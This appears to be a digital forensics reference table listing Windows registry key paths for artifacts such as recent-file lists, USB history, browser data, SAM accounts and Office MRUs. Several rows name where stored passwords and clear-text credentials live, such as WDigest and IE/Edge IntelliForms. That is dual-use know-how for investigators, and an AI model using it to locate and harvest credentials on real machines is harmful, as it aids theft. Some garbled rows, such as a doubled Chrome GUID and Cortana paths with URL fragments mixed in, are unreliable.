Class GUID for Storage Volumes | XP 7 8 10 | SYSTEM\ControlSet001\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}
Class GUID for USB Host Controllers and Hubs | XP 7 8 10 | SYSTEM\ControlSet001\Control\Class\{36FC9E60-C465-11CF-8056-444553540000}
Class GUID for Windows Portable Devices WPD | 7 8 10 | SYSTEM\ControlSet001\Control\Class\{EEC5AD98-8080-425F-922A-DABF3DE3F69A}
Class Identifiers | XP 7 8 10 | SOFTWARE\Classes\CLSID
Classes | - | HKEY_CLASSES_ROOT
Clearing Page File at Shutdown | XP 7 8 10 | SYSTEM\ControlSet###\Control\Session Manager\Memory Management / ClearPageFileAtShutdown
Clearing PageFile at Shutdown | 7 | SYSTEM\ControlSet###\Control\Session Manager\Memory Management\ClearPageFileAtShutdown
Common Dialog | 10 | [Link]\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU\.vhd
Common Dialog 32 CID Size MRU App Access | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\CIDSizeMRU
Common Dialog 32 First Folder App Access | 7 8 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\FirstFolder
Common Dialog 32 Last Visited MRU App Access | XP | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
Common Dialog 32 Last Visited PIDL MRU App Access | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
Common Dialog 32 Open Save document Access by Extension | - | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\
Common Dialog ComDlg32 Access | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRULegacy
Common Dialog ComDlg32 Access | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU\
Communications App E-Mail ID | - | [Link]\
Communications App E-Mail User Name | - | [Link]\LocalState\Platform / UserName
Communications App ID info | - | [Link]\RoamingState\\Accounts
Computer Name | XP 7 8 10 | SYSTEM\ControlSet###\Control\ComputerName\ComputerName
Computer Name Active Computer Name | XP 7 8 10 | SYSTEM\ControlSet###\Control\ComputerName\ComputerName\ActiveComputerName
Computer Name and Volume Serial Number | XP 7 8 10 | [Link]\Software\Microsoft\Windows Media\WMSDK\General
Converted Wallpaper | XP 7 8 10 | [Link]\\Control Panel\Desktop

Cortana Search | 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.com/search?q=
Cortana Search | 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.&input=2&FORM=WNSBOX&cc=US&setlang=en-US&sbts=/ 0
Credential Provider Filters | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\*
Credential Provider Filters | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\*
Credential Providers | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\*
Credential Providers | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\*
Current Configuration | - | HKEY_CURRENT_CONFIG
Current Control Set | 7 | SYSTEM\Select
Current Control Set | XP 7 8 10 | SYSTEM\Select
Current Control Set Information | 7 | SYSTEM\Select\Current
Current Drive Enumeration Service | XP 7 8 10 | SYSTEM\ControlSet001\services\Disk\Enum
Current Theme | 7 | [Link]\Software\Microsoft\Windows\CurrentVersion\Themes
Current USB Storage Enumeration Service | XP 7 8 10 | SYSTEM\ControlSet001\services\USBSTOR\Enum
Current Version Information | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\
Currently Defined Printer | 7 | SYSTEM\ControlSet###\Control\Print\Printers
Currently Mounted Drives MRU | 7 8 10 | SYSTEM\CurrentControlSet\Services\Disk\Enum
Custom Group List by RID | 7 | SAM\Domains\Account\Aliases\
Custom Group Names | 7 | SAM\Domains\Account\Aliases\Names

DAP Categories | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\Category
DAP Context Menu 1 | XP | HKEY_USERS\S-1-5-21-1757981266-1708537768-725345543-500\Software\Microsoft\InternetExplorer\MenuExt
DAP Context Menu 2 | XP | HKEY_USERS\S-1-5-21-1757981266-1708537768-725345543-500\Software\Microsoft\InternetExplorer\MenuExt
DAP DL Activity | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator
DAP Download Dir | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\FileList\(Site/Server)\DownloadDir
DAP Download URLs | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\HistoryCombo
DAP FileList | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\FileList
DAP Host Data | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\FileList\HostsData
DAP Ignored Sites | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\FileList\(Site/Server)\BlackList
DAP Install/V/Path | XP | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Download Accelerator Plus
DAP Protected URLs | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\FileList\(Site/Server)
DAP Proxy Data | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\Proxy
DAP Searched Words | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\SearchTab
DAP Unique File ID | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\FileList\(Unique File ID)
DAP User Credentials | XP | HKEY_USERS\SID\Software\SpeedBit\Download Accelerator\UserInfo
Defrag Last Run Time | 7 8 10 | SOFTWARE\Microsoft\Dfrg\Statistics\Volume / LastRunTime
Disables (or stores if 1) clear-text creds | 8 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
Disk Class Filter Driver stdcfltn | 10 | SYSTEM\ControlSet001\services\stdcfltn
Display Enumeration | XP 7 8 10 | SYSTEM\ControlSet001\Enum\DISPLAY\\
Display Monitor Settings | 7 | SYSTEM\ControlSet###\Enum\Display
Display Monitors | XP 7 8 10 | SYSTEM\ControlSet###\Enum\Display
DLLs Loaded at Bootup | 7 | SYSTEM\ControlSet###\Control\SessionManager\KnownDLLs
DLLs Loaded at Bootup | XP 7 8 10 | SYSTEM\ControlSet###\Control\SessionManager\KnownDLLs
Drives Mounted by User | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\
Dynamic Disk | XP 7 | SYSTEM\\ControlSet###\Services\DMIO\Boot Info\Primary Disk Group
Dynamic Disk Identification | 7 | SYSTEM\ControlSet###\Services\DMIO\Boot Info\Primary Disk Group
Edge Browser Favorites, Edge Favorites | 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\/ Order
Edge History Days to Keep | 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetSettings\Url History / DaysToKeep
Edge Typed URLs | 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs
Edge Typed URLs Time | 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsTime
Edge Typed URLs Visit Count | 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsVisitCount
EFS | XP 7 8 10 | [Link]\Software\Microsoft\Windows NT\CurrentVersion\EFS\CurrentKeys
EFS Attribute in File Explorer Green Color | 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Encrypted Page File | 7 8 10 | SYSTEM\ControlSet###\Control\FileSystem / NtfsEncryptPagingFile
Event Log Restrictions | 7 | SYSTEM\ControlSet###\Services\EventLog\Application
Event Log Restrictions | XP 7 8 10 | SYSTEM\ControlSet###\Services\EventLog\Application / RestrictGuestAccess
Favorites | 10 | [Link]\LocalSettings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\
File Access Windows Apps | 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\\PersistedStorageItemTable\ManagedByApp
File Associations for Immersive Apps/Windows Apps | 8 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Repository\Packages\\App\Capabilities\FileAssociations
File Extension Association Apps MRU | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.\OpenWithList
File Extension Associations | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
File Extension Associations Global | XP 7 8 10 | SOFTWARE\Classes\.ext
File Extensions Program Association | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\. / OpenWithProgids
File History | 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\FileHistory
File History Home Group Settings | 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\FileHistory\HomeGroup\Target
File History Last Backup Time | 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\FileHistory / ProtectedUpToTime
File History User(s) Initiating | 8 10 | SYSTEM\ControlSet###\Services\fhsvc\Parameters\Configs
Firewall Enabled | XP 7 8 10 | SYSTEM\ControlSet###\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile / EnableProfile
Firewall On or Off | 7 | SYSTEM\ControlSet###\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall
Floppy Disk Information | XP V | SYSTEM\ControlSet###\Enum\FDC\
Folder Descriptions | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\
Folders Stream MRUs | - | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU
FTP | 7 | [Link]\Software\Microsoft\FTP\Accounts\
FTP | XP 7 | [Link]\Software\Microsoft\FTP\Accounts\
General Open/Saved | XP 7 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU

General Recent Docs | XP | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
General Recent Files | XP | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
General USB Devices | 7 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
Google Chrome Last Browser Run Time | - | [Link]\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9Ec-AFF1-A69D9E530F96} / lastrun
Google Chrome Version | - | [Link]\Software\Google\Chrome\BLBeacon
Google Client History | 7 | [Link]\Software\Google\NavClient\1.1\History
Google Client History | - | [Link]\Software\Google\NavClient\1.1\History
Google Update Date/Time | - | [Link]\Software\Google\Google Toolbar\GoogleUpdate / InstallTimestamp
Group Memberships | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\GroupMembership
Group Memberships | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\
Group Names - Default | XP 7 8 10 | SAM\SAM\Domains\Builtin\Aliases\Names
Groups - Default | XP 7 8 10 | SAM\SAM\Domains\Builtin\Aliases\
Groups Names User or App Defined | XP 7 8 10 | SAM\SAM\Domains\Account\Aliases\Names
Groups Names User or App Defined | XP 7 8 10 | SAM\SAM\Domains\Account\Aliases\
History - Days to Keep | 10 | [Link]\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Url History / DaysToKeep
History days to keep | 10 | [Link]\SOFTWARE\LocalSettings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\[Link]oftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetSettings\Url History / DaysToKeep
Hive List Paths | XP 7 8 10 | SYSTEM\ControlSet###\Control\hivelist
Home Group | 7 | SYSTEM\ControlSet###\services\HomeGroupProvider\ServiceData

Home Group | 7 8 10 | SYSTEM\ControlSet###\Services\HomeGroupProvider\ServiceData\
Home Group Host | 7 8 10 | [Link]\SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\UIStatusCache
Home Group ID GUID | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\HME\
Home Group Info | 7 8 10 | SYSTEM\ControlSet###\Services\HomeGroupProvider\ServiceData\
Home Group Initiated | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\HME
Home Group Members | 7 8 10 | SYSTEM\ControlSet###\Services\HomeGroupProvider\ServiceData\\Members\
Home Group Members MAC Address(es) | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\HME\\Members
Home Group Network Locations Home | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\NetworkLocations\Home
Home Group Network Locations Work | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\NetworkLocations\Work
Home Group Sharing Preferences | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\HME\\SharingPreferences\
Home Group Sharing Preferences | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\HomeGroup\SharingPreferences\\
Human Interface Devices | 7 | SYSTEM\ControlSet###\Enum\HID
Human Interface Devices | XP 7 8 10 | SYSTEM\ControlSet###\Enum\HID
ICQ | - | [Link]\Software\Mirabilis\ICQ\*
ICQ Information | - | SOFTWARE\Mirabilis\ICQ\Owner
ICQ Last User | - | [Link]\Software\Mirabilis\ICQ\Owners - LastOwner
ICQ Nickname | - | [Link]\Software\Mirabilis\ICQ\Owners\UIN - Name
ICQ Registered Users | - | [Link]\Software\Mirabilis\ICQ\Owners\UIN
IDE Device Information | 7 | SYSTEM\ControlSet###\Enum\IDE\

IDE Device Information | XP 7 8 10 | SYSTEM\ControlSet###\Enum\IDE\
IDE Enumeration | XP 7 8 10 | SYSTEM\ControlSet001\Enum\IDE\\
Identity | 10 | [Link]\LocalState\HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Identities\
Identity Live Account | 10 | NTUSER\SOFTWARE\Microsoft\15.0\Common\Identity\Identities\
IDM Incomplete DLs | XP | HKEY_CURRENT_USER\Software\DownloadManager\Queue
IDM Install, Proxy | XP | HKEY_CURRENT_USER\Software\DownloadManager
IDM Installation | XP | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Internet Download Manager
IDM Offline Browsing | XP | HKEY_CURRENT_USER\Software\DownloadManager\GrabberSts\Projects
IDM Passwords | XP | HKEY_CURRENT_USER\Software\DownloadManager\Passwords\(URL)
IDM Total DL Count | XP | HKEY_CURRENT_USER\Software\DownloadManager\maxID
IE 6 Auto Logon and password | 7 | [Link]\Software\Microsoft\Protected Storage\System Provider\SID\Internet Explorer\Internet Explorer\- URL: StringData
IE 6 Clear Browser History | 7 | [Link]\Software\Microsoft\Internet Explorer\Privacy\ClearBrowserHistoryOnExit
IE 6 Default Download Directory | 7 | [Link]\Software\Microsoft\Internet Explorer
IE 6 Favorites List | 7 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\
IE 6 Settings | 7 | [Link]\Software\Microsoft\Internet Explorer\Main
IE 6 Typed URLs | 7 | [Link]\Software\Microsoft\Internet Explorer\Typed URLs
IE Auto Complete Form Data | - | [Link]\Software\Microsoft\Protected Storage System Provider
IE Auto Logon and Password | - | [Link]\Software\Microsoft\Protected Storage System Provider\SID\Internet Explorer\Internet Explorer

IE Cleared Browser History on Exit on/off | - | [Link]\Software\Microsoft\Internet Explorer\Privacy / ClearBrowserHistoryOnExit
IE Default Download Directory | - | [Link]\Software\Microsoft\Internet Explorer
IE Favorites List | XP 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites / Order
IE History Status | XP 7 8 | [Link]\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\
IE IntelliForms | - | [Link]\Software\Microsoft\Internet Explorer\IntelliForms
IE Preferences, IE Settings | - | [Link]\Software\Microsoft\Internet Explorer\Main
IE Protected Storage | XP | HKEY_CURRENT_USER\SOFTWARE\Microsoft\ProtectedStorageSystemProvider
IE Search Terms | - | [Link]\Software\Microsoft\Protected Storage System Provider\SID\Internet Explorer\Internet Explorer - q:StringIndex
IE Typed URLs | - | [Link]\Software\Microsoft\Internet Explorer\TypedURLs
IE Typed URLs Time | - | [Link]\Software\Microsoft\Internet Explorer\TypedURLsTime
IE URL History Days to Keep | - | [Link]\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlHistory / DaysToKeep
IE Web Form Data | - | [Link]\Software\Microsoft\Protected Storage System Provider\SID\Internet Explorer\Internet Explorer -
IE/Edge Auto Passwd | 10 | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
If hidden from timeline view, key is present | 10 | HKCU\Software\Microsoft\Windows\CurrentVersion\ActivityDataModel\ActivityAccountFilter\
IM Contact List | - | [Link]\Software\Microsoft\MessengerService\ListCache\.NET Messenger Service

IM File Sharing | - | [Link]\Software\Microsoft\MSNMessenger\FileSharing - Autoshare
IM File Transfers | - | [Link]\Software\Microsoft\Messenger Service - FtReceiveFolder
IM File Transfers | - | [Link]\Software\Microsoft\MSNMessenger\- FTReceiveFolder
IM Last User | - | [Link]\Software\Microsoft\MessengerService\ListCache\.NET Messenger Service - IdentityName
IM Logging Enabled | - | [Link]\Software\Microsoft\MSN Messenger\PerPassportSettings\##########\- MessageLoggingEnabled
IM Message History | - | [Link]\Software\Microsoft\MSN Messenger\PerPassportSettings\##########\- MessageLog Path
IM MSN Messenger | - | [Link]\Software\Microsoft\MessengerService\ListCache\.NET MessengerService\*
IM Saved Contact List | - | [Link]\Software\Microsoft\Messenger Service - ContactListPath
IMV Usage | - | [Link]\Software\Yahoo\Pager\IMVironments (global value)
IMVs MRU list | - | [Link]\Software\Yahoo\Pager\profiles\screen name\IMVironments
Index Locations for local searches | 7 8 10 | SOFTWARE\Microsoft\Windows Search\Gather\Windows\SystemIndex\StartPages\#> / URL
Indexed Folders | 7 8 10 | SOFTWARE\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\WorkingSetRules\#> / URL
Installed Application | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
Installed Applications | XP 7 8 10 | SOFTWARE\
Installed Applications | 7 8 10 | SOFTWARE\Wow6432Node\

Installed Applications | 7 8 10 | SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SharedDLLs
Installed Apps | - | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\(AppPaths)
Installed Default Internet Browsers | XP 7 8 10 | SOFTWARE\Clients\StartMenuInternet / default
Installed Internet Browser | XP 7 8 10 | SOFTWARE\Clients\StartMenuInternet\
Installed Metro Apps - Per Computer | 8 10 | SOFTWARE\Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\
Installed Metro Apps Per User | 8 10 | SOFTWARE\Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\\
Installed Printers Properties | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\
Installed Windows Apps | 8 10 | [Link]\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage
Interface class GUID | 7 8 10 | SYSTEM\ControlSet001\Control\DeviceClasses\{10497b1b-ba51-44e5-8318-a65c837b6661}
Internet Explorer 1 | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer
Internet Explorer 2 | 7 | HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\TypedUrls
iPhone, iPad Mounting | 8 10 | SYSTEM\ControlSet001\Enum\USB\
Jump List on Taskbar | 7 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\[Taskband Favorites and FavoritesResolve]
Jump List on Taskbar | 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband / Favorites and FavoritesResolve
Jumplist Settings | - | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
Kazaa | - | [Link]\Software\Kazaa\*
KaZaA Credentials | XP | HKEY_USERS\USER_HDD003_A\Software\KAZAA\UserDetails

LANDesk softmon utility monitors application execution | - | HKLM\SOFTWARE\[Wow6432Node]\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog\
Last Accessed Date and Time setting | XP 7 8 10 | SYSTEM\ControlSet###\Control\FileSystem\NtfsDisableLastAccessUpdate Value
Last Defrag | 10 | SOFTWARE\Microsoft\Dfrg\Statistics\Volume
Last Failed Login | 7 | SAM\Domains\Account\Users\F Key
Last Logged on User | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI
Last Logon Time | 7 | SAM\Domains\Account\Users\F Key
Last Theme | 7 | [Link]\Software\Microsoft\Windows\CurrentVersion\Themes\Last Theme
Last Time Password Changed | 7 | SAM\Domains\Account\Users\F Key
Last Visited MRU | XP | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
Last Visited MRU | 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
Last-Visited MRU | XP | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
Last-Visited MRU | 7 8 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
Links a ConnectedDevicePlatform PlatformDeviceId to the name, type, etc of the device | 10 | HKCU\Software\Microsoft\Windows\CurrentVersion\TaskFlow\DeviceCache
Live Account ID | 10 | [Link]\SOFTWARE\Microsoft\Office\15.0\Common\Identity\Identities\_LiveId
Live Account ID | 10 | [Link]\SOFTWARE\Microsoft\IdentityCRL\UserExtendedProperties\/ cid
Live Account ID | 10 | [Link]\SOFTWARE\Microsoft\AuthCookies\Live\Default\CAW / Id

Local Group List by RID | 7 | SAM\Domains\Builtin\Aliases\
Local Group Names | 7 | SAM\Domains\Builtin\Aliases\Names
Local Groups Identifiers | 7 | SAM\Domains\Builtin\Aliases\Names
Local Searches from Search Charm | - | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHistory\Microsoft.Windows.FileSearchApp
Local Settings | - | [Link]
Local User Names | XP 7 8 10 | SAM\SAM\Domains\Account\Users\Names
Local User Security Identifiers | 7 | SAM\Domains\Account\Users\Names
Logged In Winlogon | XP 7 8 10 | SOFTWARE\\Microsoft\Windows NT\CurrentVersion\Winlogon
Logon Banner Caption and Message | XP 8 10 | SOFTWARE\\Microsoft\Windows\CurrentVersion\Policies\System / LegalNoticeCaption and LegalNoticeText
Logon Banner Message | 7 | SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText
Logon Banner Title | 7 | SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption
LPT Device Information | 7 | SYSTEM\ControlSet###\Enum\LPTENUM\
LPT Device Information | XP 7 8 10 | SYSTEM\ControlSet###\Enum\LPTENUM\
LPTENUM Enumeration | XP 7 8 10 | SYSTEM\ControlSet001\Enum\LPTENUM\\
Machine SID Location | 7 | SAM\Domains\Account / V
Machine SID Location | XP 7 8 10 | SAM\SAM\Domains\Account / V
Map Network Drive MRU | XP 7 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
Media Player 10 Recent List | 7 | [Link]\Software\Microsoft\MediaPlayer\Player\RecentFileList
Media Player Recent List | XP | [Link]\Software\Microsoft\MediaPlayer\Player\RecentFileList
Memory Saved During Crash | XP 7 8 10 | SYSTEM\ControlSet###\Control\CrashControl / DumpFile
Memory Saved During Crash Enabled | XP 7 8 10 | SYSTEM\ControlSet###\Control\CrashControl / CrashDumpEnabled

Memory Saved Path During Crash | 7 | SYSTEM\ControlSet###\Control\CrashControl\DumpFile
Memory Saved While Crash Detail | 7 | SYSTEM\ControlSet###\Control\CrashControl\CrashDumpEnabled
Messenger Contacts | XP | HKEY_USERS\Software\Microsoft\InternetExplorer\TypedUrls
Microsoft Access 2007 MRU | 7 | [Link]\Software\Microsoft\Office\12.0\Access\Settings
Microsoft Access 2007 MRU Date | 7 | [Link]\Software\Microsoft\Office\12.0\Access\Settings
Monitors Currently Attached | 8 10 | SYSTEM\ControlSet001\services\monitor\Enum
Mounted Devices | XP 7 8 10 | SYSTEM\MountedDevices
Mounted Devices | XP 7 8 10 | SYSTEM\MountedDevices
MRU Live Account | 10 | NTUSER\SOFTWARE\Microsoft\Office\15.0\Word\User MRU\LiveId#>\File MRU
MRU Non Live Account | 10 | NTUSER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU
MRUs Common Dialog | 7 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
mTorrent Build | 7 | HKEY_USERS\(SID)\Software\BitTorrent\(BitTorrent Client Name)\
mTorrent File Types | 7 | HKEY_CURRENT_USER\(SID)\Software\Classes\.btsearch\: "mTorrent"
mTorrent Install Path | 7 | HKEY_USERS\(SID)\Software\Classes\Applications\[Link]e\shell\open\command
MuiCache Post Vista | 7 8 10 | [Link]\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
MuiCache Post Vista | 7 8 10 | [Link]\Local Settings\MuiCache\#\52C64B7E
MUICache Vista | - | [Link]\Software\Microsoft\Windows\Shell\MUICache
MuiCache XP | XP | [Link]\Software\Microsoft\Windows\ShellNoRoam\MUICache
Network - Computer Description | XP | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions
Network - Mapped Network Drive MRU | XP | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU

393
Network Cards | XP 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\#
Network History | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged
Network History | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed
Network History | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache
Network Workgroup Crawler | 7 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares
Network Workgroup Crawler | XP | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares
Nikon View Photo Editor MRU | - | NTUSER.DAT\Software\Nikon\NikonViewEditor\6.0\Recent File List
NTUSER Info | - | HKEY_USERS\
Number of Processors in System | 7 | SYSTEM\ControlSet###\Control\Session Manager\Environment\NUMBER_OF_PROCESSORS
Number of Processors in System | XP 7 8 10 | SYSTEM\ControlSet###\Control\Session Manager\Environment / NUMBER_OF_PROCESSORS
Office Access 2007 MRU | - | NTUSER.DAT\Software\Microsoft\Office\12.0\Access\Settings
Office Access 2007 MRU Dates | - | NTUSER.DAT\Software\Microsoft\Office\12.0\Access\Settings
Office Access MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Access\File MRU
Office Access Recent Databases | - | NTUSER.DAT\Software\Microsoft\Office\\Common\Open Find\Microsoft Office Access\Settings\File New Database\File Name MRU
Office Access Trusted Documents MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Access\Security\Trusted Documents\TrustRecords
Office Access Trusted Locations MRU | - | NTUSER.DAT\Software\Microsoft\Office\Access\Security\Trusted Locations\Location2
Office Excel Autosave (File Recovery) | - | NTUSER.DAT\Software\Microsoft\Office\ver#\Excel\Resiliency\Document Recovery\
Office Excel MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Excel\File MRU
Office Excel MRU Live Account | - | NTUSER.DAT\Software\Microsoft\Office\\Excel\User MRU\LiveId_\File MRU
Office Excel Place MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Excel\Place MRU
Office Excel Place MRU Live Account | - | NTUSER.DAT\Software\Microsoft\Office\\Excel\User MRU\LiveId_\Place MRU
Office Excel Recent Spreadsheets | - | NTUSER.DAT\Software\Microsoft\Office\\Common\Open Find\Microsoft Office Excel\Settings\Save As\File Name MRU
Office Excel Trusted Documents MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Excel\Security\Trusted Documents
Office Excel Trusted Locations MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Excel\Security\Trusted Locations
Office PowerPoint Autosave (File Recovery) | - | NTUSER.DAT\Software\Microsoft\Office\\PowerPoint\Resiliency\DocumentRecovery\
Office PowerPoint MRU | - | NTUSER.DAT\Software\Microsoft\Office\ver#\PowerPoint\File MRU
Office PowerPoint MRU Live Account | - | NTUSER.DAT\Software\Microsoft\Office\\PowerPoint\User MRU\LiveId_\File MRU
Office PowerPoint Place MRU | - | NTUSER.DAT\Software\Microsoft\Office\\PowerPoint\Place MRU
Office PowerPoint Place MRU Live Account | - | NTUSER.DAT\Software\Microsoft\Office\\PowerPoint\User MRU\LiveId_\Place MRU
